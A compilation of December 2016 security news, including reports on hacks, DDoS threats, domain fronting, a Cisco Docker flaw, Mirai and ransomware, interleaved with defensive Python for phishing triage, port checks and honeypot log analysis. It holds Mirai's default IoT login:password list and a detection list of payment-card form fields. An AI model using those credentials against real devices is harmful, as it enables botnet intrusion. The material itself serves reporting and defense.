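        and HEX_BLOB.search(html) is not None
    )


def decode_attachment(html: str, password: str) -> Optional[str]:
    """Decode the embedded blob with the password from the email body, as an
    analyst would, without running the script. Wrong passwords yield control
    characters rather than markup, so those results are rejected."""
    m = HEX_BLOB.search(html)
    if m is None:
        return None
    plain = xor_with_key(binascii.unhexlify(m.group(1)), password.encode())
    if not all(32 <= b < 127 or b in (9, 10, 13) for b in plain):
        return None
    text = plain.decode("ascii")
    return text if "<" in text else None


CARD_FIELDS = {"cardnumber", "ccnum", "cvv", "cvc", "expdate", "pin"}


def harvested_fields(decoded_html: str) -> List[str]:
    """Form input names that point to payment-data harvesting."""
    names = re.findall(r"<input[^>]*name=['\"]?([A-Za-z0-9_]+)", decoded_html)
    return sorted(n for n in names if n.lower() in CARD_FIELDS)


def triage(html: str, password_from_email: str) -> Dict[str, object]:
    """End-to-end check: flag the gate, decode, inspect the form, and record
    the endpoint the harvested data would be posted to."""
    verdict: Dict[str, object] = {
        "password_gate": looks_like_encoded_password_gate(html),
        "decoded": False, "card_fields": [], "post_to": None,
    }
    decoded = decode_attachment(html, password_from_email)
    if decoded is not None:
        verdict["decoded"] = True
        verdict["card_fields"] = harvested_fields(decoded)
        m = re.search(r"action=['\"]([^'\"]+)", decoded)
        verdict["post_to"] = m.group(1) if m else None
    return verdict
```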

Moscow wants Apple to unlock iPhone of the killer of the Russian Ambassador
25.12.2016 securityaffairs Apple

The Russian and Turkish authorities asked Apple to unlock the iPhone belonging to the assassin of Russian Ambassador Andrei Karlov.
Russia’s ambassador to Turkey, Andrei Karlov, was killed on Monday during an exhibition in Ankara. The killer was a lone Turkish gunman who shouted “God is great!” and “don’t forget Aleppo, don’t forget Syria!”

The shooter was killed by Turkish forces in a shootout, and his iPhone 4s was recovered by the special forces.

The man who killed the Russian ambassador was identified as Mevlut Mert Altıntas, an off-duty police officer who used his police ID to gain access to the exhibition where Karlov was giving a speech.


Now Russian authorities want Apple to unlock the killer’s iPhone.

According to the investigators, the shooter pretended to be an official bodyguard. Turkish and Russian authorities have now asked Apple to support the investigation by unlocking the shooter’s iPhone 4S. The request could trigger a new dispute between the tech giant and the Kremlin, similar to the San Bernardino shooter case; the data on the device, the authorities believe, could help them investigate the killer’s links to various terrorist organizations.

The authorities believe that the content on the iPhone could be useful to unmask the terrorist organization linked to the shooter.

It is easy to predict a refusal from Apple; for this reason, the Russian government is reportedly sending a team of experts to Ankara to unlock the shooter’s iPhone.

“Apparently Russia offered help and Russia is planning to send a special technical team to Turkey to unlock the iPhone, a senior Turkish official told us.” reported Macreports.com.

According to Macreports, the team of experts that arrived from Moscow could not unlock the iPhone, but it was able to retrieve some data from the device without fully unlocking it.

Experts believe the assassination was part of a plot to destabilize the relationship between the Russian Government and the Turkish one.

Merry Xmas, @Kapustkiy hacked Russian Visa center in USA
25.12.2016 securityaffairs Hacking

The notorious white hat hacker Kapustkiy hacked the Russian Visa Center in the USA and accessed information of around 3000 individuals.
The Russian Visa Center is an organization that helps Americans obtain a Russian visa; this morning the white hat hacker Kapustkiy informed me that he broke into the database of its website and accessed data on around 3,000 individuals.

Kapustkiy told me he exploited a SQL injection in the website; he hacked the website on Friday.

“I used SQL Injection to gain access” said Kapustkiy.

He shared the records with me as proof of the hack; the leaked information includes data about individuals who obtained a Russian visa.


The Russian Visa Center is part of Invisa Logistic Services, it has five offices in the US where people can receive assistance in getting a Russian visa.

The records include full names, emails, phone numbers, birth dates and other information. The archive also includes data on the staff, such as full names, usernames, encrypted passwords, permissions and other information.

Kapustkiy will not make the accessed data public because the database contains sensitive information.

The young hacker contacted the Russian Visa Center but hasn’t received any response; he also reported the issue to US-CERT.

The young hacker is very active; a few days ago he announced the hack of the website of the Costa Rica Embassy in China and the data breach of the Slovak Chamber of Commerce (www.scci.sk), which affected more than 4,000 user records.

Recently Kapustkiy targeted several organizations, including the Consular Department of the Embassy of the Russian Federation, the Argentinian Ministry of Industry, the National Assembly of Ecuador, the Venezuela Army, the High Commission of Ghana & Fiji in India, the India Regional Council as well as organizations and embassies across the world.

He also broke into the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (www.embapartwroc.com.tw), and the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

Hackers threaten to take down Xbox Live and PSN on Christmas Day
24.12.2016 thehackernews Hacking
It's once again the time of year when many of you will get new PlayStations and Xboxes, which continue to be among the most popular Christmas gifts, but chances are you won't be able to log into the online gaming networks, just as happens every Christmas holiday.
During the 2014 Christmas holidays, the notorious hacker group Lizard Squad knocked the PlayStation Network and Xbox Live offline for many gamers by launching massive DDoS attacks against the gaming networks.
This time a new hacking group, which managed to take down Tumblr this week for almost two hours, has warned gamers that it will launch another large-scale distributed denial-of-service (DDoS) attack against Xbox Live and the PlayStation Network.

Calling itself R.I.U. Star Patrol, the hacking group posted a video on YouTube announcing that it is planning to take down Sony’s PSN and Microsoft’s Xbox Live on Christmas Day by launching coordinated DDoS attacks.
"We do it because we can," the group said. "We have not been paid a single dollar for what we do."
On Wednesday, when R.I.U. Star Patrol took down Tumblr, the group contacted Mashable and explained its reason for attacking: "There is no sinister motive. It’s all for light hearted fun."
Neither Sony nor Microsoft has yet responded to the hackers' warning.
However, both Sony and Microsoft previously promised to enhance the protection of their systems to block any attack disrupting their networks, yet downtime and short outages have happened almost every Christmas.

Given that attackers can now launch DDoS attacks that reach 1 Tbps, it goes without saying that both companies should be prepared for DDoS attacks against their servers this Christmas that may exceed their expectations.
We saw coordinated DDoS attacks against DNS hosting provider Dyn last fall that broke large portions of the Internet, causing a significant outage for a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
The massive DDoS attack was launched by a botnet of an estimated 100,000 so-called Internet of Things (IoT) devices – everyday devices and appliances connected to the web – and cut off the Internet for millions of users.
So, it remains to be seen if gamers would be able to enjoy this Christmas or not.

Hackers breached the “The Standard Hong Kong” newspaper
24.12.2016 securityaffairs Hacking

The hacker @Cryptolulz666 and his colleague @EvoIsGod have broken into the website of the Hong Kong English-language newspaper “The Standard Hong Kong” (www.thestandard.com.hk).
The hackers breached the database of the website and uploaded data to Pastebin.

I reached the hackers, who confirmed that they hacked the website by exploiting a SQL injection flaw in its CMS.


The hackers posted only a small portion of the around 12,000 user records contained in the database.

“Most of the info is not dumped due to legal stuffs. It had around 12000 users but I dumped only quarter” wrote the hackers on Pastebin.

The hackers leaked the Customers and Employees tables.

According to @Cryptolulz666, most of the information in the database is quite confidential and should not be leaked for privacy reasons.
When I asked them about the motivation for the attack, they told me that their goal is to spread awareness of cyber security.

“Our objective is to embarrass the institutions… by exploiting their silly flaws…” they told me. “As I said we exploited a SQL injection vulnerability on their main website.”

Cryptolulz (@Cryptolulz666) is a former member of the Powerful Greek Army who has hacked several government websites, including that of the Russian embassy in Armenia (www.embassyru.am).

He also launched DDoS attacks against the website http://italiastartupvisa.mise.gov.it/ belonging to the Italian Government and the website of the Russian Federal Drug Control Service liquidation commission.

Hackers want to take down Xbox Live and PSN on Christmas Day

24.12.2016 securityaffairs Hacking

Christmas is a critical period for the gaming industry, which is threatened by hackers who want to paralyze its services with massive attacks.

Yesterday I reported the DDoS attacks launched by Phantom Squad and PoodleCorp against the Steam and Origin servers, and unfortunately they are not alone.

Hackers are threatening to take down Xbox Live and PSN on Christmas Day, and we know that someone already did so in the same period two years ago, when Lizard Squad hackers took down the Sony PSN and Microsoft Xbox Live networks.

Which are the risks for gamers?

People who buy or receive new PlayStation and Xbox consoles will not be able to log into the online gaming networks; it will not be possible to download or buy games online, nor to play online with other gamers.

Now a hacker group that calls itself R.I.U. Star Patrol (@StarPatrolling) has posted a video on YouTube announcing that it will take down Xbox Live and PSN on Christmas Day with a massive DDoS attack.
The threat is considered credible: the same group managed to take down Tumblr this week for two hours.

“We do it because we can,” the group said. “We have not been paid a single dollar for what we do.”
R.I.U. Star Patrol (@StarPatrolling) tweeted on 21 Dec 2016: “@mashable We are claiming responsibility for the Tumblr outage #StarPatrol”
Just after the attack, the hackers gave an interview to Mashable and explained the attack with the following statement.

“There is no sinister motive,” they replied when asked about the cause of the attacks. “It’s all for light hearted fun.”

Via DM, the group told Mashable the DDoS attack wasn’t meant to harm anyone.

The Xbox Live and PSN networks were both targeted by hackers in the past, so their operators have worked to improve their defenses; nevertheless, recent attacks powered by the Mirai botnet demonstrated that it can be quite simple for hackers to take down major web services.

Phantom Squad and PoodleCorp tango down against Steam and Origin Servers
24.12.2016 securityaffairs Hacking
The servers of the Steam gaming platform and Origin are down. Phantom Squad and PoodleCorp are claiming responsibility for the attacks.
It’s holiday time, and hackers can transform this period into a nightmare for gamers. Two years ago Lizard Squad hackers took down the networks of Sony PSN and Microsoft Xbox Live.

Now the notorious Phantom Squad group has claimed responsibility for conducting a series of massive DDoS attacks against the online gaming platform Steam and Origin servers.

According to HackRead, Phantom Squad and one of the members of the PoodleCorp hacker crew, @cripthepoodle, are targeting Steam and Origin accounts.

One year ago, Phantom Squad launched several cyber attacks against Electronic Arts and Steam. The PoodleCorp hacker group became famous due to a long string of attacks against gaming communities, including Blizzard, EA, GTA, PlayStation, PokemonGo, and League of Legends.

At the time of writing, neither company had confirmed the attacks against its systems. Some users are reporting problems with both via Twitter.

Below one of the numerous tweets from affected users:

Steam (@steam_games), 22 Dec: “Steam Winter Sale On Now! Plus, Vote For The Steam Awards! #SteamSale #SteamAwards http://zpr.io/PGkCe pic.twitter.com/T3iqTvsPgI”
René | 2 Days ^-^ (@DafuqRene), 22 Dec 2016: “@steam_games Nice Sale, I love it! #SteamSale pic.twitter.com/RshEFsBBDk”
The Down Detector service, which provides information about the status of online services, confirmed that both the EA and Steam platforms were down at the time of writing.

The hackers’ DDoS attack on the Steam servers caused serious problems for gaming servers across the world. Steam operates about 17 regional servers; all its services, including the Steam Community and the Steam Store, are down, which means that users are not able to buy Steam games for Christmas.


Stay Tuned …


Steam services are back up now

Cyber attacks against the healthcare industry are expected to grow
24.12.2016 securityaffairs Cyber
The number of cyber attacks against organizations in the healthcare industry is increasing; this trend is expected to continue in 2017.
Monitoring activity in the cyber criminal underground is essential for investigators and security experts. The value of illegal products and services gives us precious information about cyber criminal trends. Security experts are observing a significant drop in the black market value of stolen medical records; this suggests criminal organizations are focusing their efforts elsewhere.

Criminal organizations are shifting their focus from stealing data to spreading ransomware, according to a report released by the security firm TrapX.

Crooks are offering stolen records for a price ranging between $1.50 and $10 each. Across the months the price is dropped as never before, this summer cyber criminals offered 10 million patient records on TheRealDeal black marketplace for about $820,000, roughly $12 per record. Lots of data containing a smaller number of records were offered with a price per single records ranging from $40 up to $60. In 2012 the World Privacy Forum estimated the value of medical records on the criminal underground at around $50 each.

Data in medical records are precious commodities for crooks, who can use them for identity theft and medical billing fraud and scams.

Anthony James, CMO at TrapX, explained that the black market has become saturated: in 2015, experts estimated that about 112 million records were stolen, including 80 million records from the Anthem data breach.

“2015 was obviously a year where cybersecurity came to the forefront for the health care industry,” James told CSOonline.

Another interesting figure that emerged from the report is the number of organizations breached by cyber criminals, which went from 57 last year to 93 this year, up from 36 in 2015.

The overall number of records lost fell by nearly 90 percent to just 12 million records.

TrapX analyzed all the breaches reported to the Department of Health and Human Services resulting from hacking activities.

According to the experts, 31% of all major HIPAA data breaches were caused by sophisticated attacks, a 300% increase over the past three years.

“Researchers pinpointed two major trends from 2016: the continued discovery and evolution of medical device hijacking, which TrapX calls MEDJACK and MEDJACK.2, and the increase of ransomware across a variety of targets.” reported DarkReading.

The researchers explained that companies have six months to report an incident, which means that news of some attacks that occurred in 2016 will only emerge during H1 2017, so the estimates made by the experts at TrapX could be an underestimate.

The experts highlighted that the falling price for stolen records is pushing scammers to try to monetize their efforts in other ways, like ransomware-based attacks.

“That’s why ransomware has started to increase,” James said. “That’s where they’re getting their money now.”

This trend is expected to continue in 2017, which will be a difficult year for the healthcare industry.

Signal implements ‘domain fronting’ technique to bypass censorship
23.12.2016 securityaffairs Hacking

The latest update of Signal introduces the ‘domain fronting’ technique that has been implemented to circumvent censorship.
Signal is considered the most secure instant messaging app; a web search for it quickly turns up Edward Snowden’s endorsement:

“Use anything by Open Whisper Systems” Snowden says.
The cryptographer and Johns Hopkins University professor Matt Green and the well-known security expert Bruce Schneier are two other admirers of the Signal app.

The latest update of Signal introduces mechanisms to circumvent censorship and the restrictions imposed by governments that want to prevent its use.

Some states are already blocking the application with the support of ISPs. The governments of Egypt and the United Arab Emirates have applied measures to block Signal; for this reason Open Whisper Systems, which develops the app, has revised the Android version to introduce a technique called domain fronting.

“With today’s release, domain fronting is enabled for Signal users who have a phone number with a country code from Egypt or the UAE,” said company founder Moxie Marlinspike in a blog post. “When those users send a Signal message, it will look like a normal HTTPS request to www.google.com. To block Signal messages, these countries would also have to block all of google.com.”

Domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.

Domain fronting “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption,” continues the paper. “A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage.”

Domain fronting is easy to deploy and use and doesn’t require any special cooperation from network intermediaries.

If the front domain is a popular website like google.com, blocking it would have a serious impact on the censor’s own users.

Domain fronting has a cost.

Domain fronting relies on a CDN that receives the request and forwards it to the domain named in the HTTP Host header, or on a service that provides similar functionality, like Google’s App Engine.

Such services typically have a cost which, according to the paper, ranges from $0.10 to $0.25 per GB for services like Google App Engine, Amazon CloudFront, Microsoft Azure, Fastly, and CloudFlare. This cost explains why Signal isn’t enabling domain fronting by default everywhere.
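The two layers the paper describes, as an added illustration that is not Signal’s or the paper’s code: the server_name (SNI) that a censor can read on the wire names the front domain, while the HTTP Host header carried inside TLS names the real endpoint the CDN routes to. Nothing is sent over the network; the hidden domain is a constructed placeholder.

```python
"""Simulate the outer (SNI) and inner (Host header) layers of a fronted request."""
import struct

FRONT_DOMAIN = "www.google.com"            # visible in DNS and in the TLS SNI
HIDDEN_DOMAIN = "backend.signal.example"   # constructed placeholder for the Host header

def build_sni_extension(hostname):
    """Encode a TLS server_name extension (RFC 6066, section 3) for one host."""
    name = hostname.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name    # name_type 0 = host_name
    name_list = struct.pack("!H", len(entry)) + entry
    return struct.pack("!HH", 0, len(name_list)) + name_list  # extension type 0 = server_name

def parse_sni_extension(ext):
    """Decode the host_name from a server_name extension, as DPI on the path would."""
    ext_type, ext_len = struct.unpack("!HH", ext[:4])
    if ext_type != 0 or ext_len != len(ext) - 4:
        raise ValueError("not a well-formed server_name extension")
    (list_len,) = struct.unpack("!H", ext[4:6])
    body = ext[6:6 + list_len]
    name_type, name_len = body[0], struct.unpack("!H", body[1:3])[0]
    if name_type != 0 or len(body) != 3 + name_len:
        raise ValueError("unsupported or truncated server_name entry")
    return body[3:3 + name_len].decode("ascii")

def build_fronted_request(front, hidden, path="/v1/messages"):
    """Return (outer, inner): the SNI bytes seen on the wire and the HTTP
    request that travels inside the encrypted TLS session."""
    outer = build_sni_extension(front)
    inner = (f"PUT {path} HTTP/1.1\r\nHost: {hidden}\r\n"
             "Content-Length: 0\r\n\r\n").encode("ascii")
    return outer, inner

def censor_sees(outer):
    """The only name a censor can extract from the handshake."""
    return parse_sni_extension(outer)

def cdn_routes_to(inner):
    """After terminating TLS, the CDN forwards on the Host header, not on the SNI."""
    head = inner.split(b"\r\n\r\n", 1)[0].decode("ascii").split("\r\n")
    for header in head[1:]:
        name, _, value = header.partition(":")
        if name.strip().lower() == "host":
            return value.strip()
    raise ValueError("request carries no Host header")

def censor_verdict(outer, blocked_domains):
    """A censor matching SNI against a blocklist faces the paper's dilemma: the
    fronted flow passes unless the popular front domain itself is blocked."""
    return "blocked" if censor_sees(outer) in blocked_domains else "allowed"

if __name__ == "__main__":
    outer, inner = build_fronted_request(FRONT_DOMAIN, HIDDEN_DOMAIN)
    print("censor sees:", censor_sees(outer))
    print("CDN routes to:", cdn_routes_to(inner))
    print("verdict with only the hidden domain blocked:",
          censor_verdict(outer, {HIDDEN_DOMAIN}))
```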

What about domain fronting for the iOS version of Signal?

Marlinspike confirmed that an iOS version of Signal supporting domain fronting is expected soon; in the meantime a beta version is available.

A flaw in Cisco CloudCenter Orchestrator exploited by hackers in the wild
23.12.2016 securityaffairs
Cisco is warning customers about a critical privilege escalation flaw that has been exploited in attacks against the Cisco CloudCenter Orchestrator systems.
Cisco has warned its customers of a critical privilege escalation flaw in Cisco CloudCenter Orchestrator systems, tracked as CVE-2016-9223, that has been exploited in cyber attacks.

Cisco CloudCenter is a hybrid cloud management platform composed of a CloudCenter Manager and a CloudCenter Orchestrator. The CloudCenter Manager is the interface used by users and administrators, while the CloudCenter Orchestrator allows them to model, deploy and manage new and existing applications.

Cisco CloudCenter Orchestrator flaw

An unauthenticated attacker can remotely install malicious Docker containers with high privileges by exploiting a vulnerability in the Docker Engine configuration.

“A vulnerability in the Docker Engine configuration of Cisco CloudCenter Orchestrator (CCO; formerly CliQr) could allow an unauthenticated, remote attacker to install Docker containers with high privileges on the affected system,” states the security advisory published by Cisco.
An attacker can exploit this issue to load Docker containers with arbitrary privileges, including root.

“The vulnerability is due to a misconfiguration that causes the Docker Engine management port to be reachable outside of the CloudCenter Orchestrator system. An attacker could exploit this vulnerability by loading Docker containers on the affected system with arbitrary privileges. As a secondary impact this may allow the attacker to gain root privileges on the affected CloudCenter Orchestrator.”

The experts from Cisco discovered the critical flaw while working on a support case. The issue exists due to a misconfiguration that exposes the Docker Engine management port to the outside.

According to CISCO, vulnerable Cisco CloudCenter Orchestrator (CCO) deployments have the Docker Engine TCP port 2375 open and bound to local IP address

Running the command netstat -ant | grep 2375 allows a quick check of the configuration.

The Cisco Product Security Incident Response Team (PSIRT) confirmed that the flaw had been exploited in attacks in the wild.

Cisco fixed the issue by releasing CCO version 4.6.2. As a workaround, the company also suggests restricting the Docker Engine port to the localhost IP address
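A way to turn the netstat check above into a pass/fail verdict, as an added example that is not Cisco’s own tooling: it parses netstat -ant output and reports whether TCP 2375 is absent, bound only to loopback (the advisory’s workaround), or reachable on other interfaces. It assumes the Linux net-tools column layout; both sample outputs are constructed.

```python
"""Classify the Docker Engine API listener (TCP 2375) from netstat -ant output."""

DOCKER_API_PORT = 2375
LOOPBACK_HOSTS = {"127.0.0.1", "::1", "localhost"}

def split_local_address(local):
    """Split netstat's 'host:port' column; rpartition copes with IPv6 forms
    such as ':::2375' (any address) or '::1:2375' (loopback)."""
    host, _, port = local.rpartition(":")
    return host, int(port)

def docker_port_exposure(netstat_output, port=DOCKER_API_PORT):
    """Return (state, offending_binds) where state is 'absent',
    'loopback-only' or 'exposed'."""
    listeners_found = False
    offending = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Columns: Proto Recv-Q Send-Q Local-Address Foreign-Address State.
        if len(fields) < 6 or fields[5] != "LISTEN":
            continue   # skips headers and established connections
        host, listen_port = split_local_address(fields[3])
        if listen_port != port:
            continue
        listeners_found = True
        if host not in LOOPBACK_HOSTS:
            offending.append(fields[3])
    if not listeners_found:
        return "absent", []
    return ("exposed" if offending else "loopback-only"), offending

# Constructed sample: the workaround applied, API restricted to localhost.
SAFE_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51212          ESTABLISHED
"""

# Constructed sample: misconfigured host with the API bound on every interface.
EXPOSED_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:2375            0.0.0.0:*               LISTEN
tcp6       0      0 :::2375                 :::*                    LISTEN
"""

if __name__ == "__main__":
    for label, sample in (("patched", SAFE_SAMPLE), ("vulnerable", EXPOSED_SAMPLE)):
        state, binds = docker_port_exposure(sample)
        print(f"{label}: {state} {binds}")
```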

Is Mirai Really as Black as It’s Being Painted?
23.12.2016 Kaspersky
The Mirai botnet, which is made up of IoT devices and which was involved in DDoS attacks whose scale broke all possible records, causing denial of service across an entire region, has been extensively covered by the mass media. Given that the botnet’s source code has been made publicly available and that the Internet of Things trend is on the rise, no decline in IoT botnet activity should be expected in the near future.

To put this in perspective, recall the year 2012, when the source code of the Zeus banker Trojan was made publicly available. A huge number of modifications of the Trojan appeared as a result of this, many of which are still active and rank among the most widespread financial malware. Similarly, the recent leak is likely to result in the emergence of Mirai modifications, created by cybercriminals and based on the source code that was made public.

The botnet remains active. We carried out an analysis of its activity to find out how Mirai operates, what objectives its owners are pursuing and, most importantly, what needs to be done to avoid becoming part of the botnet in the future.

How Mirai Works

Based on the botnet’s source code that was published on a user forum, Mirai consists of the following components:

a command-and-control center (C&C) that contains a MySQL database of all infected IoT devices (bots) and sends commands to intermediate command distribution servers;
a Scan Receiver component that collects the results of each bot’s operation and forwards them to the component that downloads the bot onto vulnerable devices (the Distributor);
a downloader component, which delivers the bot’s binary file to a vulnerable device (using the wget and tftp utilities – but if they are not present in the system, it uses its own proprietary downloader);
a bot, which, after being launched on an infected device, connects to the command-and-control center, scans an IP range (SYN scanning) for vulnerable IoT devices and sends the scan results to the Scan Receiver component in order for further malicious code to be subsequently downloaded to the device.
An important feature of the way the Mirai botnet scans devices is that the bot uses a login and password dictionary when trying to connect to a device. The author of the original Mirai included a relatively small list of logins and passwords for connecting to different devices. However, we have seen a significant expansion of the login and password list since then, achieved by including default logins and passwords for a variety of IoT devices, which means that multiple modifications of the bot now exist.


List of logins and passwords used by the original Mirai in its search for vulnerable IoT devices

However, this is by no means all the Mirai botnet can tell us about itself.

Analysis of the Botnet’s Activity

All you need to do to evaluate the Mirai botnet’s current activity is to deploy a server with an open telnet port somewhere on the Internet and analyze connection attempts made by different bots. For example, we detected the first attempts to connect to our telnet port, by several different hosts, within three minutes of putting our experimental server online.

Two facts indicate that these connections are made by bots of the original Mirai or its modifications (i.e., by infected devices):

the accounts used by the bots in their attempts to establish a connection are found on the original botnet’s brute force word list;
an analysis of connection sources has shown that infected hosts that perform scanning are in most cases IoT devices (cameras and routers of different manufacturers).

Connection attempts by infected Mirai workstations in search of IoT devices using default passwords

Here is a list of login and password pairs most often used by Mirai bots in connection attempts:

“Login:password” combinations
1 admin : admin
2 root : xc3511
3 root : vizxv
4 root : juantech
5 root : default
6 admin : admin1234
7 root : password
8 root : root
9 root : xmhdipc
10 admin : smcadmin
If you ignore trivial combinations like “root:root” or “admin:admin”, you can get a good idea of which equipment the botnet is looking for. For example, the pairs “root:xc3511” and “root:vizxv” are default accounts for IP cameras made by rather large Chinese manufacturers.


Admin panel for managing an IP camera that is part of the botnet

As for the activity of the botnet itself, you can analyze the number of login attempts over 24 hours and see for yourself. On December 13, 2016 we recorded 5,553 attempts by Mirai bots to connect to our server, while 10 days before that, on December 3, 2016, we recorded 8,689 connection attempts. Does this mean that the botnet is losing power? Reduced activity related to searching for new potential bots might certainly be an indication that the rate at which Mirai is infecting new devices is falling, but it is too early to draw any conclusions.
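The analysis described above, as an added example that is not Kaspersky’s tooling: it takes telnet honeypot login attempts, matches each login:password pair against the ten Mirai dictionary entries quoted in the article, counts dictionary hits per day, and singles out sources that try more than one device-specific default (ignoring trivial pairs such as root:root and admin:admin, as the article suggests). The log format and all lines are constructed.

```python
"""Classify honeypot telnet login attempts against the Mirai credential list."""
from collections import Counter, defaultdict
from datetime import datetime

# The ten most frequent pairs from the article's list.
MIRAI_PAIRS = {
    ("admin", "admin"), ("root", "xc3511"), ("root", "vizxv"),
    ("root", "juantech"), ("root", "default"), ("admin", "admin1234"),
    ("root", "password"), ("root", "root"), ("root", "xmhdipc"),
    ("admin", "smcadmin"),
}
# Pairs too generic to say which hardware the scanner is after.
TRIVIAL_PAIRS = {("admin", "admin"), ("root", "root")}

# Constructed honeypot log: "<ISO timestamp> <source IP> <login> <password>".
SAMPLE_LOG = """\
2016-12-13T00:01:07Z 203.0.113.5 root xc3511
2016-12-13T00:01:09Z 203.0.113.5 root vizxv
2016-12-13T00:02:41Z 198.51.100.77 admin admin
2016-12-13T03:15:22Z 203.0.113.5 root juantech
2016-12-13T11:40:00Z 192.0.2.9 pi raspberry
2016-12-03T09:12:55Z 198.51.100.77 root xmhdipc
2016-12-03T09:13:01Z 198.51.100.77 root default
"""

def parse_line(line):
    """Split one constructed log line into (timestamp, source, login, password)."""
    ts, src, login, password = line.split(" ", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, login, password

def analyze(log_text):
    """Return (dictionary hits per day, non-trivial pairs per source,
    attempts whose credentials are not in the Mirai list)."""
    per_day = Counter()
    pairs_by_src = defaultdict(set)
    unknown = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, login, password = parse_line(line)
        pair = (login, password)
        if pair in MIRAI_PAIRS:
            per_day[ts.date().isoformat()] += 1
            if pair not in TRIVIAL_PAIRS:
                pairs_by_src[src].add(pair)
        else:
            unknown.append((src, pair))
    return per_day, dict(pairs_by_src), unknown

def likely_mirai_sources(pairs_by_src, minimum=2):
    """A source cycling through two or more device-specific defaults is a good
    candidate for an infected IoT device running the Mirai scanner."""
    return sorted(src for src, pairs in pairs_by_src.items() if len(pairs) >= minimum)

if __name__ == "__main__":
    per_day, by_src, unknown = analyze(SAMPLE_LOG)
    for day, hits in sorted(per_day.items()):
        print(f"{day}: {hits} Mirai dictionary attempts")
    print("likely infected sources:", likely_mirai_sources(by_src))
    print("attempts outside the dictionary:", unknown)
```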

How to Avoid Becoming Part of the Mirai Botnet

We recommend the following measures to prevent your devices from being included in the Mirai botnet:

Change the default account parameters on each of your devices. Account passwords should be at least 8 characters long and include digits, upper-case letters and special characters.
On each device, install the latest updates provided by the manufacturer.
It is a good idea to block all potential entry points to the operating system on your devices (telnet/SSH/web panel, etc.) from being accessed over the Internet.

Kaspersky Security Bulletin 2016. The ransomware revolution
23.12.2016 Kaspersky Analysis


In 2016, ransomware continued its rampage across the world, tightening its hold on data and devices, and on individuals and businesses.

The numbers speak for themselves:

62 new ransomware families made their appearance.
There was an 11-fold increase in the number of ransomware modifications: from 2,900 new modifications in January/March, to 32,091 in July/September.
Attacks on businesses increased three-fold between January and the end of September: the difference between an attack every 2 minutes and one every 40 seconds.
For individuals the rate of increase went from every 20 seconds to every 10 seconds.
One in five small and medium-sized businesses that paid the ransom never got their data back.
Kaspersky Security Bulletin 2016. Story of the year

2016 also saw ransomware grow in sophistication and diversity, for example: changing tack if it encountered financial software, written in scripting languages, exploiting new infection paths, becoming more targeted, and offering turn-key ransomware-as-a-service solutions to those with fewer skills, resources or time – all through a growing and increasingly efficient underground ecosystem.

At the same time, 2016 saw the world begin to unite to fight back:

The No More Ransom project was launched in July, bringing together the Dutch National Police, Europol, Intel Security and Kaspersky Lab. A further 13 organizations joined in October. Among other things, the collaboration has resulted in a number of free online decryption tools that have so far helped thousands of ransomware victims to recover their data.

This is just the tip of the iceberg – much remains to be done. Together we can achieve far more than any of us can on our own.

What is ransomware?

Ransomware comes in two forms. The most common form of ransomware is the cryptor. These programs encrypt data on the victim’s device and demand money in return for a promise to restore the data. Blockers, by contrast, don’t affect the data stored on the device. Instead, they prevent the victim from accessing the device. The ransom demand, displayed across the screen, typically masquerades as a notice from a law enforcement agency, reporting that the victim has accessed illegal web content and indicating that they must pay a spot-fine. You can find an overview of both forms of ransomware here.

Ransomware: the main trends & discoveries of 2016

“Most ransomware thrives on an unlikely relationship of trust between the victim and their attacker: that, once payment is received, the ransomed files will be returned. Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise.”

GReAT, Threat Predictions for 2017


Arrivals and departures

Arrivals – in 2016, the world said hello to Cerber, Locky and CryptXXX – as well as to 44,287 new ransomware modifications

Cerber and Locky arrived in the early spring. Both are nasty, virulent strains of ransomware that are propagated widely, mainly through spam attachments and exploit kits. They rapidly established themselves as ‘major players’, targeting individuals and corporations. Not far behind them was CryptXXX. All three families continue to evolve and to hold the world to ransom alongside well-established incumbents such as CTB-Locker, CryptoWall and Shade.

Locky ransomware has so far been spread across 114 countries #KLReport

As of October 2016, the top ransomware families detected by Kaspersky Lab products look like this:

Rank | Name | Verdicts* | Percentage of users**
1 | CTB-Locker | Trojan-Ransom.Win32.Onion / Trojan-Ransom.NSIS.Onion | 25.32
2 | Locky | Trojan-Ransom.Win32.Locky / Trojan-Dropper.JS.Locky | 7.07
3 | TeslaCrypt (active till May 2016) | Trojan-Ransom.Win32.Bitman | 6.54
4 | Scatter | Trojan-Ransom.Win32.Scatter / Trojan-Ransom.BAT.Scatter / Trojan-Downloader.JS.Scatter / Trojan-Dropper.JS.Scatter | 2.85
5 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.79
6 | CryptoWall | Trojan-Ransom.Win32.Cryptodef | 2.36
7 | Shade | Trojan-Ransom.Win32.Shade | 1.73
8 | (generic verdict) | Trojan-Ransom.Win32.Snocry | 1.26
9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.15
10 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 0.90

* These statistics are based on the detection verdicts returned by Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Percentage of users targeted by a certain crypto-ransomware family relative to all users targeted with crypto-ransomware.

